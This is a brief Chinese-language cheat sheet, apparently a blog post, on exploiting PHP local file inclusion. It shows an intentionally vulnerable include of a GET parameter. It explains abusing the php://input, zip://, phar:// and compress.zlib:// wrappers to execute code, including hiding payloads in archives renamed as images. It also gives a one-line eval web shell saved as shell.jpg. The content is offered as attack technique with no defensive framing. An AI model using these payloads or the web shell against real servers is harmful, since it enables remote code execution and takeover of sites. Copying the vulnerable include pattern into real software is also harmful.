lfi.php案例代码
<?php
include $_GET['file'];
?>
phar://、zip://、zlib://
用于读取压缩文件,zip:// 、phart:// 、zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可修改为任意后缀: jpg、png、gif、xxx等等。
php://input
php://input 可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。注:当enctype="multipart/form-data",php://input 是无效的。
zip://
如果不允许上次zip格式文件,可修改后缀为图片格式,phar协议和zip协议会无视利用的是什么包。
zip://[压缩文件绝对路径]%23[压缩文件内的子文件名] (#编码为%23)
phar://
# shell.jpg
<?php @eval($_REQUEST[1]);?>
compress.zlib://
如果是zip压缩包,后面不需要跟子文件
请发表评论